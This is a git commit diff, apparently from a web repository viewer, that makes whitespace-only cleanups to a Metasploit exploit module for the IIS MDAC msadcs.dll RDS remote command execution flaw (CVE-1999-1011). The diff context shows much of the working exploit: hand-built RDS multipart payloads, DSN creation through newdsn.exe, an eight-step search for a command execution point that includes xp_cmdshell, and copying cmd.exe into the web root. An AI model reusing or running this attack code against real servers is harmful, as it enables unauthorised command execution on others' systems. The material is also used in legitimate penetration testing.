Remove whitespace
parent
bedfd6f9eb
commit
6d0dbcb106
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
|
||||
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module can be used to execute arbitrary commands on IIS servers
|
||||
that expose the /msadc/msadcs.dll Microsoft Data Access Components
|
||||
|
@ -39,20 +35,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
and useful for debugging. Also set NAME to obtain the remote hostname,
|
||||
and METHOD to use the alternative VbBusObj technique.
|
||||
},
|
||||
'Author' => 'patrick',
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
'Author' => 'patrick',
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '272'],
|
||||
['BID', '529'],
|
||||
['CVE', '1999-1011'],
|
||||
['MSB', 'ms98-004'],
|
||||
['MSB', 'ms99-025'],
|
||||
['MSB', 'ms99-025']
|
||||
],
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# patrickw tested meterpreter OK 20120601
|
||||
# patrickw tested meterpreter OK 20120601
|
||||
# nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx
|
||||
# w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
|
||||
[ 'Automatic', { } ],
|
||||
|
@ -91,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def create_dsn(drive, dsn)
|
||||
req = "/scripts/tools/newdsn.exe?driver=Microsoft\%2BAccess\%2BDriver\%2B\%28*.mdb\%29\&dsn=#{dsn}\&dbq=#{drive}\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr="
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => req,
|
||||
'uri' => req,
|
||||
})
|
||||
|
||||
|
||||
if (res and res.code == 200 and res.body =~ /<H2>Datasource creation <B>FAILED! The most likely cause is invalid attributes<\/B><\/H2>/)
|
||||
vprint_error("DSN CREATE failed for drive #{drive} with #{dsn}.")
|
||||
return false
|
||||
|
@ -104,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return true
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exec_cmd(sql, cmd, d)
|
||||
boundary = rand_text_alphanumeric(8)
|
||||
method = datastore['METHOD'] ? "VbBusObj.VbBusObjCls.GetRecordset" : "AdvancedDataFactory.Query"
|
||||
|
@ -118,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
vprint_status("Attempting to request: #{select} on #{d}")
|
||||
|
||||
|
||||
query = "\x02\x00\x03\x00\x08\x00#{[select.size].pack('S')}\x00\x00#{select}\x08\x00#{[dsn.size].pack('S')}\x00\x00#{dsn}"
|
||||
|
||||
sploit = "--#{boundary}\r\n"
|
||||
|
||||
sploit = "--#{boundary}\r\n"
|
||||
sploit << "Content-Type: application/x-varg\r\n"
|
||||
sploit << "Content-Length: #{query.length}\r\n\r\n"
|
||||
sploit << query
|
||||
sploit << "\r\n--#{boundary}--\r\n"
|
||||
|
||||
|
||||
data = "ADCClientVersion:01.06\r\n"
|
||||
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=3'
|
||||
data << "\r\n\r\n"
|
||||
|
@ -140,14 +135,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Content-Length' => data.length,
|
||||
'Connection' => "Keep-Alive",
|
||||
},
|
||||
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
|
||||
})
|
||||
|
||||
|
||||
response = Rex::Text.to_ascii(res.body, 'utf-16be')
|
||||
|
||||
|
||||
if (response =~ /HTTP:\/\/www.microsoft.com\/activex.vip\/adofx/ || res.body =~ /o.u.t.p.u.t./)
|
||||
vprint_good("Command was successfully executed! Statement: #{select} Driver: #{d}")
|
||||
return true, sql, d
|
||||
|
@ -190,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vprint_error("Server accepted request however it failed for reasons unknown.")
|
||||
elsif (res.body =~ /\x09\x00\x01/) # magic bytes? rfp used it too :P maybe a retval?
|
||||
vprint_error("Unknown reply - but the command didn't execute")
|
||||
else
|
||||
else
|
||||
vprint_status("Unknown reply - server is likely patched:\n#{response}")
|
||||
end
|
||||
return false
|
||||
|
@ -205,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data = "ADCClientVersion:01.06\r\n"
|
||||
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=0'
|
||||
data << "\r\n\r\n--#{boundary}--\r\n"
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName',
|
||||
'agent' => 'ACTIVEDATA',
|
||||
|
@ -214,12 +207,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Content-Length' => data.length,
|
||||
'Connection' => "Keep-Alive",
|
||||
},
|
||||
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
|
||||
|
||||
})
|
||||
|
||||
|
||||
if (res.code == 200 and res.body =~ /\x01(.+)/) # Should return the hostname
|
||||
print_good("Hostname: #{$1}")
|
||||
end
|
||||
|
@ -237,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\\system32\\ias\\ias.mdb",
|
||||
"\\system32\\ias\\dnary.mdb",
|
||||
"\\system32\\certlog\\certsrv.mdb" ]
|
||||
|
||||
|
||||
mdbs = [ "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", #these are non-windows
|
||||
"\\cfusion\\cfapps\\forums\\forums_.mdb",
|
||||
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
|
||||
|
@ -255,16 +247,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
|
||||
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
|
||||
]
|
||||
|
||||
|
||||
print_status("Step 1: Trying raw driver to btcustmr.mdb")
|
||||
|
||||
|
||||
drives.each do |drive|
|
||||
sysdirs.each do |sysdir|
|
||||
ret = exec_cmd("Select * from Customers where City=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=#{drive}:\\#{sysdir}\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
|
||||
return ret if (ret)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 2: Trying to make our own DSN...")
|
||||
x = false # Stop if we make a DSN
|
||||
drives.each do |drive|
|
||||
|
@ -274,21 +266,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
table = rand_text_alphanumeric(3)
|
||||
print_status("Step 3: Trying to create a new table in our own DSN...")
|
||||
exec_cmd("create table #{table} (B int, C varchar(10))", nil, "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general make table query
|
||||
|
||||
|
||||
print_status("Step 4: Trying to execute our command via our own DSN and table...")
|
||||
ret = exec_cmd("select * from #{table} where C=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general exploit table query
|
||||
return ret if (ret)
|
||||
|
||||
|
||||
print_status("Step 5: Trying to execute our command via known DSNs...")
|
||||
dsns.each do |dsn|
|
||||
ret = exec_cmd("select * from MSysModules where name=", "cmd /c echo x", dsn) # this is table-independent query (new)
|
||||
return ret if (ret)
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 6: Trying known system .mdbs...")
|
||||
drives.each do |drive|
|
||||
sysdirs.each do |sysdir|
|
||||
|
@ -299,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 7: Trying known program file .mdbs...")
|
||||
drives.each do |drive|
|
||||
mdbs.each do |mdb|
|
||||
|
@ -308,14 +300,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return ret if (ret)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 8: Trying SQL xp_cmdshell method...")
|
||||
ret = exec_cmd("EXEC master..xp_cmdshell", "cmd /c echo x", "driver={SQL Server};server=(#{datastore['DBHOST']});database=#{datastore['DBNAME']};uid=#{datastore['DBUID']};pwd=#{datastore['DBPASSWORD']}") # based on hdm's sqlrds.pl :)
|
||||
return ret if (ret)
|
||||
|
||||
|
||||
return -1
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
print_status("Searching for valid command execution point...")
|
||||
x = false
|
||||
|
@ -325,10 +317,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
break
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if (x == true)
|
||||
print_good("Successful command execution found!")
|
||||
|
||||
|
||||
# now copy the file
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
|
||||
|
@ -396,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def cleanup
|
||||
framework.events.remove_exploit_subscriber(self)
|
||||
end
|
||||
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
# Don't try the start command...
|
||||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
|
|
Loading…
Reference in New Issue